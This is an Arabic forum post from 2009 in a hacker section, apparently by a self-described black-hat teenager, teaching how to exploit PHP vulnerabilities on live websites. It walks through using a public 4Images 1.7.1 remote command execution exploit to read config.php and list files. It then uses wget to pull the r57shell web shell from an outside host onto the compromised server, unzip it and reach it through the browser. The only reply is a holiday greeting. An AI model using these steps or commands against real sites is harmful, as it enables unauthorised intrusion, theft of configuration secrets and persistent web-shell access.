منتديات ايجى موكا
آلسلام عليكم ورحمه الله وبركـآته
W:W
آهلا وسهلا بيك فى منتديات
ايجى موكا
طنطاويه | منتديات | دردشه | شات | أفلام | أغاني | برامج | صور | العاب | كليبات | رنات | أسلاميات | أغاني شعبي | راب | موبايلات | سفر | سياحة | طنطاويه| أغاني ...
منتديات ايجى موكا
آلسلام عليكم ورحمه الله وبركـآته
W:W
آهلا وسهلا بيك فى منتديات
ايجى موكا
طنطاويه | منتديات | دردشه | شات | أفلام | أغاني | برامج | صور | العاب | كليبات | رنات | أسلاميات | أغاني شعبي | راب | موبايلات | سفر | سياحة | طنطاويه| أغاني ...
منتديات ايجى موكا
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات ايجى موكا

ايجى موكا | منتديات | دردشه | شات | أفلام | أغاني | برامج | صور | العاب | كليبات | رنات | أسلاميات | أغاني شعبي | راب | موبايلات | سفر | سياحة |ايجى موكا| أغاني| راب.. ...
 
الرئيسيةبوابه ايجى موكاأحدث الصورالتسجيلدخول

 

 طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,

اذهب الى الأسفل 
كاتب الموضوعرسالة
????
زائر
Anonymous



طـريقة استغـلال ثغـرات الـ php مـع التطبيق , Empty
مُساهمةموضوع: طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,   طـريقة استغـلال ثغـرات الـ php مـع التطبيق , Icon_minitimeالجمعة مايو 08, 2009 11:02 am

--------------------------------------------------------------------------------

الـسلام عليكم ورحمـة الله وبــركاته

بندخل بالموضوع بدون مقدمات ( بالعربي ماعندي شي اقوله ) :D

طيب اول شي كيف تعرف انها php ?

بتـلقاء اول الكـود حق الثغـره مكتـوب كذا



كود PHP:
<?php
طيـب آستغلال الثغـرات هذي تـحفظهـا بآمتداد php وتـرفعه على موقـع , مثـل ليوكس او غيره ,

طيـب بناخـذ ثغرة


كود:
4Images <= 1.7.1 remote commands execution through arbitrary local

الثــغره في البــوٍوٍم الصـور 4Images الاصــدار : 1.7.1

طيــب هــذآ سورس الثغــره الي نـزل في مـواقع السكـيورتي ,

http://www.milw0rm.com/exploits/1533

زي ماشفنـا في بـداية الكـود <?php اوكـ, الحـين احـفظ الثغـره في جهـازك وانا سميتها كذا saudi.php

لاحظ الامتداد الي حطـيته php ورح ارفــعها على موقع يقبل هالامتــداد , وانـا رفعتـها على مـوقع وهـذا رابط الثغـره ,

http://www.web4new.com/gallery/saudi.php

طبـعا الطـلبات واضـحه ,,

اول خيــآر : رابــط المـوقع واحط مثــال هو , www.sitename.com

ثــآني خيآر : آســم المجلد ع المـوٍوٍقـع , وحــاط مثـال هو /4images/ or just او غيـره

ثـالث خيـآر : (آمــر لينكس او ويندوز) وحــاط مثال هـو specify a command ("cat config.php" ,

وامـر لينكس مهــمه جـدا والكل لازم يعـرفها او يآخذ نبذه بسيـطه عنـها عشـان يعرف يتعـامل مع هالنظام ,


طبعا احنا اخذنا الخيارات المهمه اول ثلاث خيارات الي حـاط عليــها * نجمه ,

طيب بنطـبق على مـوقع مصـاب ونــشوف



زي ماشفنا في الصـوره كتـبت الامـر ls -l وهو لـعرض الملفات مـع تصاريحها ,




وهـذي هي المـلفات طيــب الحيـن نشوفلنا ملف تصريحه 777 ومـلف data تصريحه 777 زي مانشـوف في الصوره

بس الملف الي احنا علي تصريحه 777 اكتـب بدال الامر ls -l الامر هذا which wget وبيقــولك !/usr/bin/wget

يعنــي تقــدر تـرفع طيب تمـام الحيــن نرفع لنـا شل ,



زي ماشفــناء في الصـوره كتـبت كـذا


كود:
wget http://www.web4new.com/gallery/r57shell.zip
wget = آمــر الرفع والرابــط رآبـط الشل ,

وآظغــط (GO)

طـيب الحيــن عشــان تتآكد انه ارتـــفع روح واكتـب الامر ls -l وبتـشوفه مع المـلفات ,



كـل شي تمام طيب الحين تفـك الظغـط عن الشـل ,




unzip = امـر فك الظـغط

r57shell.zip = المـلف الي رفعناه ,



ولاحـظ الصوره بعد ماظغطنــاء go , فـك الظغـط , وطـلع الملف r57shell.php ,

وهــذي صـوره توضــح ..



خــلاص الحـين كل شي تــمام تشــوف مســارك ويـن ,



pwd : امـر يحدد مسـارك ع السيرفر ,



زي ماشفـنا في الصــوره عطانا المسـار الي احنـاء فيه ,


كود:
/home/mubailes/public_html/main
فــي المجلد الرئيسي تبع الموقع في مجلد main يعني هنا بيكون الشل

www.xxxx.com/main/r57shell.php ,

وهــذي الصــوره بعد دخــولنا ع الشــل ,



وبكــذا ان شاء الله نكون عـرٍرٍفنا كيف نستغـل ثغـرات الـ php واخذنـا الثغـره هذي كمثــال ,
واكيــد كل ثغـره يفرق استثماره عن الثاني وان شاء الله يكون الـدرس واضـح واي سـؤال انا حاظـر ,

والسـلام عليكم ورحمة الله وبـركاته ,, :D

التوقيع
سنعود قريبا إن شاء الله

أدعولي بالتوفيق

nick : devil-x , team : black hat's crew , age : 19
الرجوع الى أعلى الصفحة اذهب الى الأسفل
$$المجروح$$
SuPer VIP
SuPer VIP
$$المجروح$$


طـريقة استغـلال ثغـرات الـ php مـع التطبيق , 4210o
الهوايــة : طـريقة استغـلال ثغـرات الـ php مـع التطبيق , Chess10
المهن : طـريقة استغـلال ثغـرات الـ php مـع التطبيق , Studen10
ذكر الجدي عدد المساهمات : 1605
نقاط : 1861
تاريخ التسجيل : 27/05/2009
العمر : 33
المزاج متظبت

طـريقة استغـلال ثغـرات الـ php مـع التطبيق , Empty
مُساهمةموضوع: رد: طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,   طـريقة استغـلال ثغـرات الـ php مـع التطبيق , Icon_minitimeالإثنين أغسطس 10, 2009 12:42 pm

طـريقة استغـلال ثغـرات الـ php مـع التطبيق , 668523402

كل عام وانتم بخير بمناسبة شهر رمضان الكريم اللهم بلغنا رمضان وبارك لنا فى اعمالنا وتقبلها منا
قولو امين
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://mooka.tk/
 
طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات ايجى موكا :: منتديات الهاكر :: مكتبة الثغرات exploits-
انتقل الى: